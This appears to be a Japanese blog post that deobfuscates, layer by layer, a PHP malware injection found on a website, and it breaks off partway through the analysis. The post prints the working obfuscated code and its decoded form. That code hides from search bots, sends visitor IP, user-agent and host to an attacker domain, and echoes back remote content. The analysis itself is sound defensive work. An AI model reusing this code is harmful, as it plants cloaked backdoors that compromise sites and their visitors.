I7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave')); $evalUdCXTDQERmWnDS =18792; }
コードをきれいに整形すると、上記のようになる。
「evallwhVfIVnWPbT」関数でやっているのは strrev と同じで文字列をひっくり返すだけ。それを評価、実行している。
一行ずつ関数にかけてみる。
//eval(evallwhVfIVnWPbT(';))"=ASf7kyaNRmbBRXWvNnRjFUWJxWY2VGJoUGZvNWZk9FN2U2chJGIuJXd0Vmc7BSKr1EZuFEdZ92cGNWQZlEbhZXZkgiRTJkZPl0ZhRFbPBFaO1EbhZXZg42bpR3YuVnZ"(edoced_46esab(lave')); eval(base64_decode("ZnVuY3Rpb24gZXZhbE1OaFBPbFRhZ0lPZkJTRigkZXZhbElZQWNGc29ZdEFuZE1rKSB7cmV0dXJuIGJhc2U2NF9kZWNvZGUoJGV2YWxJWUFjRnNvWXRBbmRNayk7fSA="));
//eval(evallwhVfIVnWPbT(';))"7kiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXNFZnNEZVlVaFNVbhxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxhbVNFaVlVZENnZFNXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI90TQjBjUIFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VWPXZVchZlcpV2VUxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxUV2VpclZhcVZXPWV2YWxNTmhQT2xUYWdJT2ZCU0YoImFIUjBjQT09Iik7"));
//eval(evallwhVfIVnWPbT(';))"7kiI9QzVhJCKGNlQm9USnFGVs9EUo5UTsFmdl1jQmhFRVdEdiVFZCxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxCZFVidEdVRFhmQj1ldmFsTU5oUE9sVGFnSU9mQlNGKCJhVzQ9Iik7"));
//eval(evallwhVfIVnWPbT(';))"==wOpISP9EVS2R2VJJCKGNlQm9USnFGVs9EUo5UTsFmdl1TZVpnRuV2QsJ2dRxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxRd2JsQ2VuRnpVZT1ldmFsTU5oUE9sVGFnSU9mQlNGKCJJV2R2SVE9PSIpOw=="));
//eval(evallwhVfIVnWPbT(';))"=sTXpISV1UlUIZEMYNlVwUlV5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk0zQmN2ZNBndpNXTyxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxyTXNpdnBNZ2NmQz0kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5VlUwVlNYMEZIUlU1VSIpXTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpkicqNlVjF0ahRGWZRXMhZXZkgidlJnc0NHKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKHN0cnJldigkZXZhMXRZWGRha0FjVlNqcikpKTs="));
//eval(evallwhVfIVnWPbT(';))"=sTKpISP9c2YshXbZRnRtVlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI0Y1RaVnRXdlIoY0UCZ2TJdWYUx2TQhmTNxWY2VGIskiI9kEWaJDbHFmaKhVWmZ0VhJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICM50WUP5kVUJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpISPB52YxgnMVJCKGNlQm9USnFGVs9EUo5UTsFmdlBCLpICb4JjW2ljMSJCKGNlQm9USnFGVs9EUo5UTsFmdlhSehJnchBSPgQHUEh2bzdEduREdUxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxUdERudEdzb2hEUHQgPSBhcnJheShldmFsTU5oUE9sVGFnSU9mQlNGKCJSMjl2WjJ4bCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJVMngxY25BPSIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJUVk5PUW05MCIpLCBldmFsTU5oUE9sVGFnSU9mQlNGKCJhV0ZmWVhKamFHbDJaWEk9IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIldXRnVaR1Y0IiksIGV2YWxNTmhQT2xUYWdJT2ZCU0YoIlVtRnRZbXhsY2c9PSIpKTs="));
//eval(evallwhVfIVnWPbT(';))"==wOpkiI5QHVLpnUDtkeS5mYsJlbiZnTygFMWJjWmZ1RiBnWHF1Z002YxIFWalHdIlEcNhkSvRTbR1kTyIlSsBDVaZ0MhpkSVRlRkZkYopFWadGNyIGcSNTW1ZlbaJCKGNlQm9USnFGVs9EUo5UTsFmdlhCbhZXZ"(edoced_46esab(lave')); eval(base64_decode("ZXZhbChldmFsTU5oUE9sVGFnSU9mQlNGKCJablZ1WTNScGIyNGdaWFpoYkZkRlRVSkphM0ZaVDBsSlIyTk1RbTRvSkhNcElIdHlaWFIxY200Z1FHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDUnpLVHQ5IikpOw=="));
//eval(evallwhVfIVnWPbT(';))"==wOpgCMkRGJg0DIYpHRyh1TId2SnxWY2VGJ"(edoced_46esab(lave')); eval(base64_decode("JGV2YWxnS2dIT1hyRHpYID0gJGRkMCgpOw=="));
//eval(evallwhVfIVnWPbT(';))"==Qf9tDajFETatGVCZFb1F3ZzN3csFmdlRCIvh2YltTXxsFajFETatGVCZFb1F3ZzN3csFmdlRCI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCajFETatGVCZFb1F3ZzN3csFmdlRCLlVleG5WZDxmY3FFbhZXZkgSZk9GbwhXZg0DIoNWQMp1aUJkVsVXcnN3czxWY2VGJ7lSKlVleG5WZDxmY3FFbhZXZkwCajFETatGVCZFb1F3ZzN3csFmdlRCKyR3cyR3coAiZptTKp0VKiUlTxQVS5YUVVJlRTJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1XkgSZk92YuVGbyVnLpISOn1mSigiRTJkZPl0ZhRFbPBFaO1EbhZXZukyQmN2ZNBndpNXTyxWY2VGJoUGZvNmblxmc15SKikTStpkIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLdliI9kkRSVkRwglRSFDVOZ1aVJCKGNlQm9USnFGVs9EUo5UTsFmdltlUFZlUFN1Xk4SKi0DMUFmIoY0UCZ2TJdWYUx2TQhmTNxWY2VmLpISP4Q0YigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiIvJkbMJCKGNlQm9USnFGVs9EUo5UTsFmdl5iQmhFRVdEdiVFZCxWY2VGJukiI90zdMJCKGNlQm9USnFGVs9EUo5UTsFmdl5CW6RkcY9ESnt0ZsFmdlRiLpISP4kHTigiRTJkZPl0ZhRFbPBFaO1EbhZXZukiI90zZPJCKGNlQm9USnFGVs9EUo5UTsFmdl5yVWFXYWJXaldFVsFmdlRCKuJETjdUSJ9UWxtWSC1URXxWY2VGI9ACajFETatGVCZFb1F3ZzN3csFmdlRCI7kCMwgDMxsSKoUWbpRHLpkiI90ESkhmUzMmIoY0UCZ2TJdWYUx2TQhmTNxWY2VGK1QWbsc1Ukd2QkVVWpV0UtFGbhZXZkgSZpt2bvNGdlNHQgsHIlNHblBSf7BSKpkSXXNFZnNEZVlVaFNVbhxWY2VGJbVUSL90TD9FJoQXZzNXaoAicvBSKpMkZjdWTwZXaz1kcsFmdlRCIsISavICIuASK0BFRo92cHRnbERHVsFmdlRCIsICfigSZk9Gbw1Wag4CIi8iIog2Y0FWbfdWZyBHKoYWa"(edoced_46esab(lave')); eval(base64_decode("aWYoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRldmFsVHREbnRHc29oRFB0KSAuICIvaSIsICRldmFsck1zaXZwTWdjZkMpKSBvciAoaXNzZXQoJF9DT09LSUVbJGV2YWxhbVNFaVlVZENnZFNXXSkpKSB7fSBlbHNlIHsgQHNldGNvb2tpZSgkZXZhbGFtU0VpWVVkQ2dkU1csbWQ1KGV2YWxNTmhQT2xUYWdJT2ZCU0YoImMzUmhkSE09IikpLHRpbWUoKSsxMDgwMCk7ICRldmFsc3NzZ3F1bFZCVGtaTEFjaCA9IGV2YWxXRU1CSWtxWU9JSUdjTEJuKCRldmFsVFdlaXJWYXFWVy5ldmFsTU5oUE9sVGFnSU9mQlNGKCJPZz09IikuZXZhbE1OaFBPbFRhZ0lPZkJTRigiTHk4PSIpLiRldmFsZ0tnSE9YckR6WC5ldmFsTU5oUE9sVGFnSU9mQlNGKCJMdz09IikuJGV2YWxCZFVidEdVRFhmQi5ldmFsTU5oUE9sVGFnSU9mQlNGKCJMbkJvIikuZXZhbE1OaFBPbFRhZ0lPZkJTRigiY0Q4PSIpLmV2YWxNTmhQT2xUYWdJT2ZCU0YoImFUMD0iKS4kX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJVa1ZOVDFSRlgwRkVSRkk9IildLmV2YWxNTmhQT2xUYWdJT2ZCU0YoIkptSTkiKS51cmxlbmNvZGUoJGV2YWxyTXNpdnBNZ2NmQykuZXZhbE1OaFBPbFRhZ0lPZkJTRigiSm1nOSIpLnVybGVuY29kZSgkX1NFUlZFUltldmFsTU5oUE9sVGFnSU9mQlNGKCJTRlJVVUY5SVQxTlUiKV0pKTtpZiAoc3Ryc3RyKCRldmFsc3NzZ3F1bFZCVGtaTEFjaCwkZXZhbFF3YmxDZW5GelVlKSl7JGV2YWxzc3NncXVsVkJUa1pMQWNoID0gZXhwbG9kZSgkZXZhbFF3YmxDZW5GelVlLCRldmFsc3NzZ3F1bFZCVGtaTEFjaCk7ICRldmFsc3NzZ3F1bFZCVGtaTEFjaCA9ICRldmFsc3NzZ3F1bFZCVGtaTEFjaFsxXTtlY2hvICRldmFsc3NzZ3F1bFZCVGtaTEFjaDt9fQ=="));
これらのbase64をデコードすると
function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) {return base64_decode($evalIYAcFsoYtAndMk);} $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM="); $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA=="); $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4="); $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ=="); $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")]; eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr))); $evalTtDntGsohDPt = array(evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==")); eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9")); $evalgKgHOXrDzX = $dd0(); if((preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) {} else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")]));if (strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){$evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1];echo $evalsssgqulVBTkZLAch;}}
これが返ってくるので、整形する。
function evalMNhPOlTagIOfBSF($evalIYAcFsoYtAndMk) { return base64_decode($evalIYAcFsoYtAndMk); } $evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM="); $evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA=="); $evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4="); $evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ=="); $evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")]; eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr))); $evalTtDntGsohDPt = array( evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==") ); eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9")); $evalgKgHOXrDzX = $dd0(); if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) { } else { @setcookie($evalamSEiYUdCgdSW,md5(evalMNhPOlTagIOfBSF("c3RhdHM=")),time()+10800); $evalsssgqulVBTkZLAch = evalWEMBIkqYOIIGcLBn($evalTWeirVaqVW.evalMNhPOlTagIOfBSF("Og==").evalMNhPOlTagIOfBSF("Ly8=").$evalgKgHOXrDzX.evalMNhPOlTagIOfBSF("Lw==").$evalBdUbtGUDXfB.evalMNhPOlTagIOfBSF("LnBo").evalMNhPOlTagIOfBSF("cD8=").evalMNhPOlTagIOfBSF("aT0=").$_SERVER[evalMNhPOlTagIOfBSF("UkVNT1RFX0FERFI=")].evalMNhPOlTagIOfBSF("JmI9").urlencode($evalrMsivpMgcfC).evalMNhPOlTagIOfBSF("Jmg9").urlencode($_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9IT1NU")])); if ( strstr($evalsssgqulVBTkZLAch,$evalQwblCenFzUe)){ $evalsssgqulVBTkZLAch = explode($evalQwblCenFzUe,$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch = $evalsssgqulVBTkZLAch[1]; echo $evalsssgqulVBTkZLAch; } }
整形したものを解析する。
$evalamSEiYUdCgdSW=evalMNhPOlTagIOfBSF("c3RhdHM=");
base64デコードすると「stats」が出てくる。
$evalTWeirVaqVW=evalMNhPOlTagIOfBSF("aHR0cA==");
デコードで「http」がでてくる。
$evalBdUbtGUDXfB=evalMNhPOlTagIOfBSF("aW4=");
デコードで「in」がでてくる。
$evalQwblCenFzUe=evalMNhPOlTagIOfBSF("IWdvIQ==");
デコードで「!go!」がでてくる。
$evalrMsivpMgcfC=$_SERVER[evalMNhPOlTagIOfBSF("SFRUUF9VU0VSX0FHRU5U")];
デコードで「HTTP_USER_AGENT」がでてくる。つまり、
$evalrMsivpMgcfC = $_SERVER["HTTP_USER_AGENT"];
ということ。
eval(evalMNhPOlTagIOfBSF(strrev($eva1tYXdakAcVSjr)));
さきほどオトリだと思っていた、配列の[0]がココで出てくる。strrevなのでひっくり返してbase64デコードをかけると、
$fri55 = ';$retarn($fif25,$fif52,$fit52';$fr55 = '$retrun(';$fr52 = 'MKU}f6T4';$fri52 = '\x3d\42\x29\51\x3b';$fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20";eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145";$fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b";$fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22";preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'");$psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');
というコードが。これを整形すると
$fri55 = ';$retarn($fif25,$fif52,$fit52'; $fr55 = '$retrun('; $fr52 = 'MKU}f6T4'; $fri52 = '\x3d\42\x29\51\x3b'; $fri25 = '\112\x48\112\x6c\144\x48'; $fr25 = $fri52.'")'.$fri55; $dri25 = "\x24\144\x64\60\x20\75\x20"; eval('$fif25 = "\x40\50\x2e\53\x29\100\x69\145"; $fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b"; $fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22"; preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163'.$fr25.'."'.$fri25.'\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75'.$fr25.'."'.$fri25.'\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163'.$fr25.'."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37'.$fri25.'\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75'.$fri52.'"); $psi1='.$fr55.'"'.$fr52.'PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").'.$fr55."'".''.$fr52.'LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@'."'".').'.$fr55."'".$fr52.'PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:'."'".').'.$fr55."'".$fr52.'PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@'."'".');'.$dri25.'$retun("",$psi1.'.$fr55.'"fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").'.$fr55.'"OpQyeVL:"));');
上記のようなコードになるので、コレを実行すると
$dd0 = $fif25 = "\x40\50\x2e\53\x29\100\x69\145"; $fif52 = "\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b"; $fit52 = "\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22"; preg_replace($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x47\106\x79\142\x6a\60\x6e\143\x48\112\x6c\132\x31\71\x79\132\x58\102\x73\131\x57\116\x6c\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\126\x75\120\x53\144\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6e\117\x77\75\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\112\x48\112\x6c\144\x48\112\x31\142\x6a\60\x6e\143\x6d\126\x30\143\x6e\126\x75\112\x7a\163\x3d\42\x29\51\x3b");$retarn($fif25,$fif52,$fit52."\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\143\x6d\126\x30\143\x6e\126\x75\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x70\111\x48\163\x6b\132\x6e\126\x75\131\x32\154\x30\142\x32\64\x67\120\x53\102\x6a\143\x6d\126\x68\144\x47\126\x66\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x6f\111\x69\131\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x69\114\x43\111\x6b\111\x69\64\x69\132\x6e\126\x75\131\x33\122\x70\142\x32\64\x67\120\x53\102\x6a\141\x48\111\x6f\142\x33\112\x6b\113\x43\121\x69\114\x69\112\x6d\144\x57\65\x6a\144\x47\154\x76\142\x69\153\x74\115\x79\153\x37\111\x69\153\x37\112\x48\112\x6c\144\x48\126\x79\142\x69\101\x39\111\x48\116\x30\143\x6c\71\x7a\143\x47\170\x70\144\x43\147\x6b\143\x6d\126\x30\144\x58\112\x75\113\x54\164\x68\143\x6e\112\x68\145\x56\71\x33\131\x57\170\x72\113\x43\122\x79\132\x58\122\x31\143\x6d\64\x73\111\x43\122\x6d\144\x57\65\x6a\141\x58\122\x76\142\x69\153\x37\143\x6d\126\x30\144\x58\112\x75\111\x47\112\x68\143\x32\125\x32\116\x46\71\x6b\132\x57\116\x76\132\x47\125\x6f\141\x57\61\x77\142\x47\71\x6b\132\x53\147\x69\111\x69\167\x6b\143\x6d\126\x30\144\x58\112\x75\113\x53\153\x37\146\x51\75\x3d\42\x29\51\x3b"); $psi1=$retrun("MKU}f6T4PlD<LJQ|]ZI3]Y<pgZ8mgJoyeljqMKMogKY|elfvM6MogKY|elDlg5YlOVLxf6Ylf6U|NFU|][U4fp7vPFz}NWvqNWv@").$retrun('MKU}f6T4LG3j\6Mo\[Uo[5]4epQ3dZ<xNFfnfpY3g[MxM|zqfpY3g[MxLJ4nQVjnfpY3g[MxNWvqNWv@').$retrun('MKU}f6T4PVD<LJQ|]ZI3]Y<pgZ8mgJoyeljqM|zqfpY3g[MxLJ43[6MkepTrPV3{OGHuPVn:M|n:').$retrun('MKU}f6T4PWLjSVEmfpYkgJYi]qYx\6Use57rM|UmfpYkgJYi]qYx\6Use57qOFg|][U4fp7j]5Y3dJ<}gJM8epIw]Vjn\6Mo\[Uo[5]4epQ3dZ<xOlLx\|LxLpHlNWvqNWv@');$dd0 = $retun("",$psi1.$retrun("fpY3g[MxLFU3f6Q3QVjngKQ}gGX{PljngKQ}gGX|NFU3f6Q3QVjngKQ}gGX{NFnsNVnsOlL@").$retrun("OpQyeVL:"));
というものが出てくる。 $dd0 全体がまたコードになっている。
$psi1 の中身は
$tsst52 = create_function('$return','return "web-".substr($return,0,3);');$tsst5 = create_function('$return','return md5($return);');$tsst51 = create_function('','return mt_rand(1-1,1+1);');$tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');
というコードが返ってくる。
この上の部分で無名関数を作っている。
これで
$dd0() = "f528764d624db129b32c21fbca0cb8d6.com";
ということがわかった。
整形すると
$tsst52 = create_function('$return','return "web-".substr($return,0,3);'); $tsst5 = create_function('$return','return md5($return);'); $tsst51 = create_function('','return mt_rand(1-1,1+1);'); $tsst512 = create_function('$create_function','return gethostbyname($create_function.".c"."a");');
となる。
$evalTtDntGsohDPt = array( evalMNhPOlTagIOfBSF("R29vZ2xl"), evalMNhPOlTagIOfBSF("U2x1cnA="), evalMNhPOlTagIOfBSF("TVNOQm90"), evalMNhPOlTagIOfBSF("aWFfYXJjaGl2ZXI="), evalMNhPOlTagIOfBSF("WWFuZGV4"), evalMNhPOlTagIOfBSF("UmFtYmxlcg==") );
この配列を解析すると、
array( 'Google', 'Slurp', 'MSNBot', 'ia_archiver', 'Yandex', 'Rambler' );
という配列が見えてくる。見ての通りこれは検索ボットのリスト。
この時点で、ユーザエージェントが検索ボットの場合には攻撃コードを返さないようにするのが推定できる。
eval(evalMNhPOlTagIOfBSF("ZnVuY3Rpb24gZXZhbFdFTUJJa3FZT0lJR2NMQm4oJHMpIHtyZXR1cm4gQGZpbGVfZ2V0X2NvbnRlbnRzKCRzKTt9"));
これを変換すると
eval( function evalWEMBIkqYOIIGcLBn($s) {return @file_get_contents($s);} );
となるので、 file_get_contents でどこからかファイルを取得するようだ。
$evalgKgHOXrDzX = $dd0(); //この$dd0() に難読化された攻撃者のサーバドメイン名が入る。
if( (preg_match("/" . implode("|", $evalTtDntGsohDPt) . "/i", $evalrMsivpMgcfC)) or (isset($_COOKIE[$evalamSEiYUdCgdSW]))) { //ユーザエージェントが検索ボットだったら何もしない。もしくは、「stats」という名前のCookieをユーザが持っている場合でも何もしない。
} else { //それ以外の場合はこちらが実行される。
